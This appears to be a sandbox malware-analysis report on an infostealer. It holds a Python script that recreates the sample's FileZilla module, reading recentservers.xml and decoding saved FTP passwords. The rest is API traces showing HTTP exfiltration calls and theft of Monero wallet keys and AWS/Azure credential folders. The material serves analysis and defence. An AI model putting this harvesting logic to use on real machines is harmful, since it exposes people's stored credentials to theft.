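The API trace above shows the FileZilla module of this sample: it reads %APPDATA%\Roaming\FileZilla\recentservers.xml into a heap buffer, locates the <Host>, <Port>, <User> and <Pass encoding="base64"> tags with plain StrStrA substring searches, and concatenates the values into a "browser: FileZilla / profile: null / url: / login: / password:" record. The following Python is an added example written for this page, not code from the report or from the sample; it reproduces that extraction on a constructed recentservers.xml so an analyst can see what the exfiltrated record looks like and why the password falls out immediately (FileZilla only base64-encodes it). The separator strings the trace references at 00991770, 00991774, 00991780 and 00991790 are not resolved in the report, so the ':' between host and port and the newline between fields are assumptions.

```python
import base64

# Constructed sample of %APPDATA%\FileZilla\recentservers.xml. It is not taken from
# the analysed sample or the report; a real FileZilla file has the same shape.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
    <RecentServers>
        <Server>
            <Host>ftp.example.test</Host>
            <Port>21</Port>
            <Protocol>0</Protocol>
            <Type>0</Type>
            <User>alice</User>
            <Pass encoding="base64">aHVudGVyMg==</Pass>
            <Logontype>1</Logontype>
        </Server>
        <Server>
            <Host>sftp.example.test</Host>
            <Port>2222</Port>
            <Protocol>1</Protocol>
            <Type>0</Type>
            <User>bob</User>
            <Pass encoding="base64">Y29ycmVjdCBob3JzZQ==</Pass>
            <Logontype>1</Logontype>
        </Server>
    </RecentServers>
</FileZilla3>
"""

# Tag literals exactly as they appear in the StrStrA calls of the API trace.
TAG_HOST = "<Host>"
TAG_PORT = "<Port>"
TAG_USER = "<User>"
TAG_PASS = '<Pass encoding="base64">'


def _text_after(blob, tag):
    """StrStrA-style extraction: find the opening tag, then take everything up to
    the next '<'. Returns None when the tag is absent from this chunk."""
    start = blob.find(tag)
    if start == -1:
        return None
    start += len(tag)
    end = blob.find("<", start)
    return blob[start:end] if end != -1 else None


def parse_recentservers(xml_text):
    """Return one dict per <Server> element. The password is base64-decoded only;
    FileZilla does not encrypt it, so no key or DPAPI call is needed."""
    records = []
    for chunk in xml_text.split("<Server>")[1:]:
        pass_b64 = _text_after(chunk, TAG_PASS)
        try:
            password = base64.b64decode(pass_b64 or "").decode("utf-8", "replace")
        except (ValueError, TypeError):
            password = ""  # malformed <Pass>: keep the record, leave the password blank
        records.append({
            "host": _text_after(chunk, TAG_HOST) or "",
            "port": _text_after(chunk, TAG_PORT) or "",
            "user": _text_after(chunk, TAG_USER) or "",
            "password": password,
        })
    return records


def format_record(rec):
    """Assemble the record in the order of the lstrcat calls. The labels are the
    literals from the trace; the ':' and newline separators are assumptions, since
    the report does not resolve the strings at 00991770/00991774/00991780/00991790."""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host']}:{rec['port']}\n"
        f"login: {rec['user']}\n"
        f"password: {rec['password']}\n"
    )


def dump_filezilla(xml_text):
    """Full module output for one recentservers.xml: concatenated records."""
    return "".join(format_record(r) for r in parse_recentservers(xml_text))


if __name__ == "__main__":
    print(dump_filezilla(SAMPLE_RECENTSERVERS), end="")
```

The same four tags, and the same base64 encoding, are used in FileZilla's sitemanager.xml; the trace only shows recentservers.xml being opened. Running the script against a real profile is a quick way to confirm what a stealer with this module would have harvested from a compromised host, and the plaintext result is the argument for enabling FileZilla's master password or for not saving FTP credentials at all.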
                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 00974800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974889
                                          • Part of subcall function 00974800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974899
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00975A48
                                        • StrCmpCA.SHLWAPI(?,0181FCB0), ref: 00975A63
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00975BE3
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0181FD30,00000000,?,0181EC20,00000000,?,00991B4C), ref: 00975EC1
                                        • lstrlen.KERNEL32(00000000), ref: 00975ED2
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00975EE3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00975EEA
                                        • lstrlen.KERNEL32(00000000), ref: 00975EFF
                                        • lstrlen.KERNEL32(00000000), ref: 00975F28
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00975F41
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00975F6B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00975F7F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00975F9C
                                        • InternetCloseHandle.WININET(00000000), ref: 00976000
                                        • InternetCloseHandle.WININET(00000000), ref: 0097600D
                                        • HttpOpenRequestA.WININET(00000000,0181FB90,?,0181F008,00000000,00000000,00400100,00000000), ref: 00975C48
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • InternetCloseHandle.WININET(00000000), ref: 00976017
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: 772d17015878b1c5069b563d669ce2dfebb34c406088d9aeb353ad8a8a097f08
                                        • Instruction ID: 588749f3141f11bbc25543ca5d96d967e2d38edc456553f26b4a3a705f8c3aea
                                        • Opcode Fuzzy Hash: 772d17015878b1c5069b563d669ce2dfebb34c406088d9aeb353ad8a8a097f08
                                        • Instruction Fuzzy Hash: 1D121271920118ABDB15FBA0DCA5FEEB379BF94700F00459AF10672191EF786A49CF61
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 00988CF0: GetSystemTime.KERNEL32(00990E1B,0181EC50,009905B6,?,?,009713F9,?,0000001A,00990E1B,00000000,?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 00988D16
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0097D083
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0097D1C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0097D1CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D308
                                        • lstrcat.KERNEL32(?,00991570), ref: 0097D317
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D32A
                                        • lstrcat.KERNEL32(?,00991574), ref: 0097D339
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D34C
                                        • lstrcat.KERNEL32(?,00991578), ref: 0097D35B
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D36E
                                        • lstrcat.KERNEL32(?,0099157C), ref: 0097D37D
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D390
                                        • lstrcat.KERNEL32(?,00991580), ref: 0097D39F
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D3B2
                                        • lstrcat.KERNEL32(?,00991584), ref: 0097D3C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D3D4
                                        • lstrcat.KERNEL32(?,00991588), ref: 0097D3E3
                                          • Part of subcall function 0098AB30: lstrlen.KERNEL32(00974F55,?,?,00974F55,00990DDF), ref: 0098AB3B
                                          • Part of subcall function 0098AB30: lstrcpy.KERNEL32(00990DDF,00000000), ref: 0098AB95
                                        • lstrlen.KERNEL32(?), ref: 0097D42A
                                        • lstrlen.KERNEL32(?), ref: 0097D439
                                          • Part of subcall function 0098AD80: StrCmpCA.SHLWAPI(00000000,00991568,0097D2A2,00991568,00000000), ref: 0098AD9F
                                        • DeleteFileA.KERNEL32(00000000), ref: 0097D4B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: d89be5cf04df5eb0193c7b7f70895fcb17219de350dd7a7d6a7e1bc5c558c9a5
                                        • Instruction ID: 30f6aaa0d50f47ecb806cea9a1227e54f5e28ac2c56f99f91d1326b803fdae64
                                        • Opcode Fuzzy Hash: d89be5cf04df5eb0193c7b7f70895fcb17219de350dd7a7d6a7e1bc5c558c9a5
                                        • Instruction Fuzzy Hash: 2AE12275910108ABDB04FBA4DD96FEE7379BF94301F10455AF106B61A1DF39AE08CB62
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0181DE38,00000000,?,00991544,00000000,?,?), ref: 0097CB6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0097CB89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0097CB95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0097CBA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0097CBD9
                                        • StrStrA.SHLWAPI(?,0181DE50,00990B56), ref: 0097CBF7
                                        • StrStrA.SHLWAPI(00000000,0181DF10), ref: 0097CC1E
                                        • StrStrA.SHLWAPI(?,0181DFC8,00000000,?,00991550,00000000,?,00000000,00000000,?,018189E8,00000000,?,0099154C,00000000,?), ref: 0097CDA2
                                        • StrStrA.SHLWAPI(00000000,0181E188), ref: 0097CDB9
                                          • Part of subcall function 0097C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0097C971
                                          • Part of subcall function 0097C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0097C97C
                                        • StrStrA.SHLWAPI(?,0181E188,00000000,?,00991554,00000000,?,00000000,018189F8), ref: 0097CE5A
                                        • StrStrA.SHLWAPI(00000000,01818BC8), ref: 0097CE71
                                          • Part of subcall function 0097C920: lstrcat.KERNEL32(?,00990B47), ref: 0097CA43
                                          • Part of subcall function 0097C920: lstrcat.KERNEL32(?,00990B4B), ref: 0097CA57
                                          • Part of subcall function 0097C920: lstrcat.KERNEL32(?,00990B4E), ref: 0097CA78
                                        • lstrlen.KERNEL32(00000000), ref: 0097CF44
                                        • CloseHandle.KERNEL32(00000000), ref: 0097CF9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: 8098f1eec20509ca8e8517f72cce3d14d7001d98f33a46a35a8460d0e0309844
                                        • Instruction ID: ae195ac3be88b3eba15e7146621925809b154e8f9f23de3c19b5d4a6e914900a
                                        • Opcode Fuzzy Hash: 8098f1eec20509ca8e8517f72cce3d14d7001d98f33a46a35a8460d0e0309844
                                        • Instruction Fuzzy Hash: 98E1EF75910108ABDB14FBA4DCA2FEEB779BF94300F00459AF10677291EF386A49CB65
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • RegOpenKeyExA.ADVAPI32(00000000,0181BC10,00000000,00020019,00000000,009905BE), ref: 00988534
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009885B6
                                        • wsprintfA.USER32 ref: 009885E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0098860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0098861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00988629
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 09002091fa6a356e76626bb78b182b92e238269e780910093c5a6459456aabd2
                                        • Instruction ID: a6fb14b906ca5ef4b9382be29fd48520e337e8a47cbbd1f66aa5e1b1056e8b42
                                        • Opcode Fuzzy Hash: 09002091fa6a356e76626bb78b182b92e238269e780910093c5a6459456aabd2
                                        • Instruction Fuzzy Hash: D0811F759111189BEB28EB54CD95FEE77B8BF48700F1086D9F109A6280DF746B84CFA0
                                        APIs
                                          • Part of subcall function 00988F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00985000
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 0098501D
                                          • Part of subcall function 00984B60: wsprintfA.USER32 ref: 00984B7C
                                          • Part of subcall function 00984B60: FindFirstFileA.KERNEL32(?,?), ref: 00984B93
                                        • lstrcat.KERNEL32(?,00000000), ref: 0098508C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 009850A9
                                          • Part of subcall function 00984B60: StrCmpCA.SHLWAPI(?,00990FC4), ref: 00984BC1
                                          • Part of subcall function 00984B60: StrCmpCA.SHLWAPI(?,00990FC8), ref: 00984BD7
                                          • Part of subcall function 00984B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00984DCD
                                          • Part of subcall function 00984B60: FindClose.KERNEL32(000000FF), ref: 00984DE2
                                        • lstrcat.KERNEL32(?,00000000), ref: 00985118
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00985135
                                          • Part of subcall function 00984B60: wsprintfA.USER32 ref: 00984C00
                                          • Part of subcall function 00984B60: StrCmpCA.SHLWAPI(?,009908D3), ref: 00984C15
                                          • Part of subcall function 00984B60: wsprintfA.USER32 ref: 00984C32
                                          • Part of subcall function 00984B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00984C6E
                                          • Part of subcall function 00984B60: lstrcat.KERNEL32(?,0181FC40), ref: 00984C9A
                                          • Part of subcall function 00984B60: lstrcat.KERNEL32(?,00990FE0), ref: 00984CAC
                                          • Part of subcall function 00984B60: lstrcat.KERNEL32(?,?), ref: 00984CC0
                                          • Part of subcall function 00984B60: lstrcat.KERNEL32(?,00990FE4), ref: 00984CD2
                                          • Part of subcall function 00984B60: lstrcat.KERNEL32(?,?), ref: 00984CE6
                                          • Part of subcall function 00984B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00984CFC
                                          • Part of subcall function 00984B60: DeleteFileA.KERNEL32(?), ref: 00984D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: 49f019ef4c3d4dcd7102e4eab63c993c2f2aa2f19e4aa4758156c334ffc35cec
                                        • Instruction ID: 9da4d916f16630204a43c5339d4b879773cb0f7282afd01c54532b757c954c44
                                        • Opcode Fuzzy Hash: 49f019ef4c3d4dcd7102e4eab63c993c2f2aa2f19e4aa4758156c334ffc35cec
                                        • Instruction Fuzzy Hash: EE41937AA4020867DF24F770DC47FDD73286FE4704F404994B249661C1EEB9A7D88B92
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009891FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: image/jpeg
                                        • API String ID: 2244384528-3785015651
                                        • Opcode ID: 1036d805b183be7efd4772e6ef45ceb76f6c030265079821683f3b11ae411995
                                        • Instruction ID: e6f46dc0f4ea0d4720c8f60f6863f574e3572f4eaecc4a495ed8f728dcf380ce
                                        • Opcode Fuzzy Hash: 1036d805b183be7efd4772e6ef45ceb76f6c030265079821683f3b11ae411995
                                        • Instruction Fuzzy Hash: EA71BA75A14208EBDB14EFE4DC89FEEB7B9BB49700F148609F516A7290DB74E904CB60
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00983415
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 009835AD
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0098373A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
